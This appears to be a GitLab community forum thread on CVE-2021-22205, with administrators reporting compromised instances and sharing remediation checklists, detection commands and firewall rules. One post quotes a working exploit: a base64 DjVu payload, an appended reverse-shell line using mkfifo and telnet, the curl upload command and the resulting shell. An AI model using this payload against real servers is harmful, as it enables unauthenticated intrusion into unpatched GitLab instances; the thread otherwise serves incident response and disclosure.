It would be much appreciated if you could guide me through this in more detail, or show me how to stop the scripts, at least the ones you found.
Since they can do RCE, they can probably do privilege escalation as well; getting the initial foothold is usually the harder part. Setting up a firewall or putting the instance behind something like a VPN would be safer.
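For example, a minimal sketch using ufw, assuming your GitLab instance serves SSH and HTTPS and that 10.8.0.0/24 is your VPN subnet (both the tool and the subnet are only examples; adapt to your setup):

```
# Deny everything inbound by default, then allow GitLab ports only from the VPN subnet
sudo ufw default deny incoming
sudo ufw default allow outgoing
sudo ufw allow from 10.8.0.0/24 to any port 22 proto tcp    # git over SSH / admin access
sudo ufw allow from 10.8.0.0/24 to any port 443 proto tcp   # GitLab web UI and API
sudo ufw enable
```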
(I wrote this when @ralfaro’s post first appeared, but for some reason I didn’t send it.) I think it’s good that GitLab published information like this. I’m less impressed that it happened so long after patched versions came out. The vulnerability was not present in 13.11, which came out in April.
A malicious actor exploiting CVE-2021-22205 may leave scripts or crontab entries that persist even after the GitLab instance has been patched or upgraded.
If you’re running a patched or updated GitLab version and there’s evidence your system is still compromised, consider backing up your GitLab data and restoring it on a fresh server.
In my case, I patched to 14.4 yesterday and Workhorse is still logging their activity. The system root crontab was not accessible to them, although they tried. And here’s the thing: I think they somehow scheduled jobs disguised as a legitimate project, but GitLab’s interface doesn’t show them; only Workhorse does.
Here is the latest ExifTool log output:
{"correlation_id":"01FM1SSKGHKV156MYXGANN64W1","filename":"l.jpg","imageType":1,"level":"info","msg":"invalid content type, not running exiftool","time":"2021-11-09T07:32:27Z"}
{"client_mode":"local","copied_bytes":767,"correlation_id":"01FM1SSKGHKV156MYXGANN64W1","is_local":true,"is_multipart":false,"is_remote":false,"level":"info","local_temp_path":"/opt/gitlab/embedded/service/gitlab-rails/public/uploads/tmp","msg":"saved file","remote_id":"","temp_file_prefix":"l.jpg","time":"2021-11-09T07:32:27Z"}
{"content_type":"text/html; charset=utf-8","correlation_id":"01FM1SSKGHKV156MYXGANN64W1","duration_ms":43,"host":"[MY IP ADDRESS],"level":"info","method":"POST","msg":"access","proto":"HTTP/1.1","referrer":"","remote_addr":"[TARGET IP ADDRESS]","remote_ip":"[TARGET IP ADDRESS]","route":"","status":404,"system":"http","time":"2021-11-09T07:32:27Z","ttfb_ms":40,"uri":"/9y38mzr4pcus5x62","user_agent":"python-requests/2.26.0","written_bytes":3108}
As you can see, the jpg files were located in /opt/gitlab/embedded/service/gitlab-rails/public/uploads/tmp. Now that I have deleted them, the POST attempts return 204 responses, but the script is still running. Any tips for me?
I just patched our system because it was also compromised. I see a few admin users were created, which I will delete. But I also see some access tokens that appear to have been added recently under the root login. See the attached screenshot. I was going to remove them, but I want to be sure they’re not supposed to be there?
Thanks!
-Chris
Hello,
I’m currently facing a similar problem. Does anyone know if this vulnerability is fixed in GitLab CE 14.4.0-ce.0?
Thank you.
Somehow, I feel that GitLab should have been more proactive in alerting about this and should have gathered information on how to clean an exploited instance.
I had three users added as admins on 1/11, and also 3 API tokens created under my admin account, which I revoked.
I’ve been running GitLab in a Docker instance. How does it handle uploaded files? Are they deleted when I shut down and upgrade to the latest version, or do I need to manually remove some uploaded images now?
Also, another thing I don’t quite get with this exploit: how is it possible that someone who doesn’t have an account on my GitLab instance, which is closed for signups, can upload image files without being logged in?
Could you let me know the log locations?
I found this helpful in this circumstance.
See below, or go to the source here: AttackerKB source
Attack Path & Exploit
The confusion around the privilege required to exploit this vulnerability is odd. Unauthenticated and remote users have been, and still are, able to reach execution of ExifTool via GitLab by design. Specifically, `HandleFileUploads` in `uploads.go` is called from a couple of `PreAuthorizeHandler` contexts, allowing the `HandleFileUploads` logic, which calls down to `rewrite.go` and `exif.go`, to execute before authentication.
The fall-out of this design decision is interesting in that an attacker needs none of the following:
- Authentication
- A CSRF token
- A valid HTTP endpoint
As such, the following `curl` command is sufficient to reach, and exploit, ExifTool:
curl -v -F 'file=@echo_vakzz.jpg' http://10.0.0.8/$(openssl rand -hex 8)
In the example above, I reference `echo_vakzz.jpg`, which is the original exploit provided by @wcbowling in their HackerOne disclosure to GitLab. The file is a DjVu image that tricks ExifTool into calling `eval` on user-provided text embedded in the image. Technically speaking, this is an entirely separate issue in ExifTool. @wcbowling provides an excellent explanation here.
But for the purpose of GitLab exploitation, now that we know how easy it is to reach ExifTool, it’s only important to know how to generate a payload. A very simple method was posted on the OSS-Security mailing list by Jakub Wilk back in May, but it is character-limited. So here is a reverse shell that reaches out to 10.0.0.3:1270, made by building off of @wcbowling’s original exploit.
albinolobster@ubuntu:~$ echo -e "QVQmVEZPUk0AAAOvREpWTURJUk0AAAAugQACAAAARgAAAKz//96/mSAhyJFO6wwHH9LaiOhr5kQPLHEC7knTbpW9osMiP0ZPUk0AAABeREpWVUlORk8AAAAKAAgACBgAZAAWAElOQ0wAAAAPc2hhcmVkX2Fubm8uaWZmAEJHNDQAAAARAEoBAgAIAAiK5uGxN9l/KokAQkc0NAAAAAQBD/mfQkc0NAAAAAICCkZPUk0AAAMHREpWSUFOVGEAAAFQKG1ldGFkYXRhCgkoQ29weXJpZ2h0ICJcCiIgLiBxeHs=" | base64 -d > lol.jpg
albinolobster@ubuntu:~$ echo -n 'TF=$(mktemp -u);mkfifo $TF && telnet 10.0.0.3 1270 0<$TF | sh 1>$TF' >> lol.jpg
albinolobster@ubuntu:~$ echo -n "fSAuIFwKIiBiICIpICkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgCg==" | base64 -d >> lol.jpg
We can substitute the generated `lol.jpg` into the curl command like so:
albinolobster@ubuntu:~/Downloads$ curl -v -F 'file=@lol.jpg' http://10.0.0.7/$(openssl rand -hex 8)
*   Trying 10.0.0.7...
* Connected to 10.0.0.7 (10.0.0.7) port 80 (#0)
> POST /e7c6305189bc5bd5 HTTP/1.1
> Host: 10.0.0.7
> User-Agent: curl/7.47.0
> Accept: */*
> Content-Length: 912
> Expect: 100-continue
> Content-Type: multipart/form-data; boundary=------------------------ae83551d0544c303
>
< HTTP/1.1 100 Continue
The resulting reverse shell looks like the following:
albinolobster@ubuntu:~$ nc -lnvp 1270
Listening on [0.0.0.0] (family 0, port 1270)
Connection from [10.0.0.7] port 1270 [tcp/*] accepted (family 2, sport 34836)
whoami
git
id
uid=998(git) gid=998(git) groups=998(git)
Ah, thanks. I have tested that 13.0.14 was affected by this, but version 13.12.8 has fixed it. It’s a bit scary, as ExifTool is used everywhere. I hope the GitLab team has closed all the holes.
If this RCE vulnerability was exploited on your instance, it’s possible that abuse or malicious user access to the system may persist even after upgrading or patching GitLab.
Unfortunately, there is no one-size-fits-all solution or comprehensive checklist one can use to completely secure a server that has been compromised. GitLab recommends following your organization’s established incident response plan whenever possible.
The suggestions below may help mitigate the threat of further abuse or a malicious actor having persistent access, but this list is not comprehensive or exhaustive.
GitLab-specific (a shell sketch covering a few of these checks follows the list):
- Audit user accounts, delete suspicious accounts created in the past several months
- Review the GitLab logs and server logs for suspicious activity, such as activities taken by any user accounts detected in the user audit.
- Rotate admin / privileged API tokens
- Rotate sensitive credentials/variables/tokens/secrets (located in instance configuration, database, CI pipelines, or elsewhere)
- Check for suspicious files (particularly those owned by the `git` user and/or located in `tmp` directories)
- Migrate GitLab data to a new server
- Check for crontab / cronjob entries added by the `git` user
- Upgrade to the latest version and adopt a plan to upgrade after every security patch release
- Review project source code for suspicious modifications
- Check for newly added or modified GitLab Runners
- Check for suspicious webhooks or git hooks
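As a rough starting point, here is a sketch of a few of the checks above on an Omnibus install (the paths, the gitlab-rails commands, and the 90-day window are assumptions; adapt them to your environment):

```
# List admin accounts and recently created users (the 90-day window is an arbitrary example)
sudo gitlab-rails runner 'User.where(admin: true).find_each { |u| puts "#{u.username} #{u.created_at}" }'
sudo gitlab-rails runner 'User.where("created_at > ?", 90.days.ago).find_each { |u| puts "#{u.username} #{u.created_at}" }'

# Crontab entries added by the git user
sudo crontab -u git -l

# Suspicious files owned by the git user in temp directories
sudo find /tmp /var/tmp -user git -type f -ls
```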
Additionally, the suggestions below are common steps taken in incident response plans when servers are compromised by malicious actors (a brief command sketch follows this list).
- Look for unrecognized background processes
- Review network logs for uncommon traffic
- Check for open ports on the system
- Establish network monitoring and network-level controls
- Restrict access to the instance at the network level (restrict access to authorized users/machines only)
- Decommission servers that were compromised
- Migrate data on the compromised server to a new server with all the latest security patches
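A few of these can be spot-checked quickly with standard Linux tooling (a minimal sketch; commands may differ slightly on your distribution):

```
# Unrecognized background processes, with their start times
ps -eo pid,user,lstart,cmd --sort=start_time

# Listening sockets / open ports and the processes behind them
sudo ss -tulpn

# Established connections worth reviewing
sudo ss -tnp state established
```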
This is an important check to do; it looks like we’ve seen evidence of this vector in active use. It would be a way for an attacker to re-establish control of the system.
Check every repo for custom hooks in /var/opt/gitlab/git-data/repositories/@hashed/*/*/*.git/custom_hooks/* (and/or the relevant path for Git repos still using legacy storage).
Check also for any added server hooks.
To find out where these are put on from-source and Omnibus installs, and also where repository hooks are stored (by default) on a from-source install, check out the custom hooks docs.
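A quick way to enumerate per-repository custom hooks on a default Omnibus install (hashed-storage path only; legacy-storage and server-hook locations depend on your configuration, see the docs above):

```
# List custom_hooks directories and their contents under the default Omnibus storage path
sudo find /var/opt/gitlab/git-data/repositories -type d -name custom_hooks -exec ls -la {} \;
```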
Additionally, please consider subscribing to our security alerts via the Communication Preference Center | GitLab so you are emailed when GitLab publishes a security release.
We at AWS had all our GitLab AMIs inspected and, if needed, upgraded.
Another indicator was shared by @antondollmaier: the presence of `__$$RECOVERY_README$$__.html` files in Git repos, plus `POST /uploads/user HTTP/1.0` events in the logs. Thank you!
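A rough sketch for checking both indicators (the repository and log paths are Omnibus defaults and may differ on your install):

```
# Ransom-note files dropped into repository storage
sudo find /var/opt/gitlab/git-data/repositories -name '__$$RECOVERY_README$$__.html'

# Matching upload attempts in the nginx and Workhorse logs
sudo grep -r 'POST /uploads/user' /var/log/gitlab/nginx/ /var/log/gitlab/gitlab-workhorse/
```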
We’ve seen recent reports of unpatched, publicly accessible GitLab instances having Git repository data encrypted by a ransomware attack.
Indicators of compromise associated with this may include:
- Users unable to clone or push any projects
- Errors when trying to view repositories in the UI
- Suspicious files in the Git repo directories on the server (e.g. files ending in `.locked` or `.html`); see the sketch after this list
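A minimal sketch for spotting that last indicator (the repository path is the Omnibus default and the 30-day window is an arbitrary example):

```
# Recently modified .locked or ransom-note HTML files inside repository storage
sudo find /var/opt/gitlab/git-data/repositories -type f \
  \( -name '*.locked' -o -iname '*readme*.html' \) -mtime -30 -ls
```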
If you find that data has been encrypted by a ransomware attack, industry-standard best practice is to:
- follow your organization’s security incident response and disaster recovery plan
- restore from the last known-good backup (one taken before the ransomware attack)
To help mitigate the threat of abuse and attacks moving forward:
- Restrict access to the GitLab instance/server at the network layer
- Patch the instance immediately after restoring from backup
- Plan an upgrade to the latest GitLab version as soon as possible
- Subscribe to security alerts via email in the GitLab Communication Preference Center or subscribe to our Security Releases RSS feed and adopt a plan to upgrade after every security release
- Take regular backups of GitLab data (a minimal backup sketch follows this list)
- Review this list of suggestions and best practices for securing a compromised server
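For the backup point above, a minimal sketch on an Omnibus install running GitLab 12.2 or later (the destination path is a placeholder; note that configuration and secrets are not included in the backup archive):

```
# Create a full application backup (repositories, database, uploads, ...)
sudo gitlab-backup create

# gitlab.rb and gitlab-secrets.json are NOT in the archive; copy them separately
# (/secure/backup/location is a placeholder destination)
sudo cp /etc/gitlab/gitlab.rb /etc/gitlab/gitlab-secrets.json /secure/backup/location/
```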
Guys, goddamnit, do something about your idea of “security”.
You should never, ever process any files from an unauthenticated entity if the instance is set to private mode. Why would you comb through random files supplied from random internet addresses with random Golang scripts invoking random 3rd-party utils? Have you gone insane or what?
Here’s another thing, again absolutely unexpected from an admin perspective. Our instance has the Restricted visibility levels setting configured with Public checked. One might expect that to fence off unauthenticated access to the entire GitLab install. But that’s not the case; see https://bit.ly/3A3CokF. Complete repo read access is possible! This is crazy.
There should be a way to lock the instance down from anyone unauthorized.
The third thing is /etc/gitlab/gitlab-secrets.json rotation. What are we supposed to do with those secrets on a compromised instance? They need a way to be rotated, and there currently is none.
I agree with everything in your post. We still get security alerts from our antivirus because of this vulnerability, even though our instance is no longer vulnerable.
I don’t get why GitLab still processes those files from unauthenticated entities. It’s a major problem that should be patched ASAP, but it seems like nobody cares.
@kulisse GitLab has been patched. Since your installation was obviously infected, you need to clean it up: maybe the gists still exist on your install and are still being found, or there are files on the server itself that are being found and scanned.
Usually when a server is compromised, you should really start from zero and restore. Otherwise you need to make sure it has been completely cleaned up. That is most likely why you still have issues.